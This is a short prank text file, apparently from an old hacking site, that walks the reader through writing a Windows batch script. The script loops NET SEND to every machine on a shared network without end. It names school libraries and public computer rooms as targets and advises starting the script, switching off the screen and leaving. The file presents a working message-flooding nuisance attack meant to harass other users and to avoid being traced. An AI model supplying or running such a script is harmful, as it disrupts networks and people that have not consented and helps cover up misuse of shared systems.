DO NOT TRY THIS AT HOME : Text files and message bases are for INFORMATIONAL PURPOSES ONLY. Do not undertake any project based upon any information obtained from this or any other web site.We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.
Well this is something to typically use in either something like the public school liberary, usually has a lot of comps. Public comp place. Or ICT (Informatica?) lessons.
What to do first is open notepad ;)
Alright now that you’ve opened notepad I’ll tell you what to do.
Write down as I write
@echo off
:1
NET SEND * "(message)"
goto 2
:2
NET SEND * "(message)"
goto 3
:3
NET SEND * "(message)"
goto 4
:4
NET SEND * "(message)"
goto 5
:5
NET SEND * "(message)"
goto 1
Replace the (message) with anything you want, but leave the quotes ("s). Save the file you created as .bat
Open the *.bat file you created and leave asap, right after turning off the computer screen.
This will make all the computers in the network if they haven’t implied some protection in the routers recieve 5 messages a second.
Have fun annoying everyone.
By the way this program will go on forever until it is closed since the bat file states it goes from :1 to :2 to :3 to :4 to :5 to :1 and so on ;).
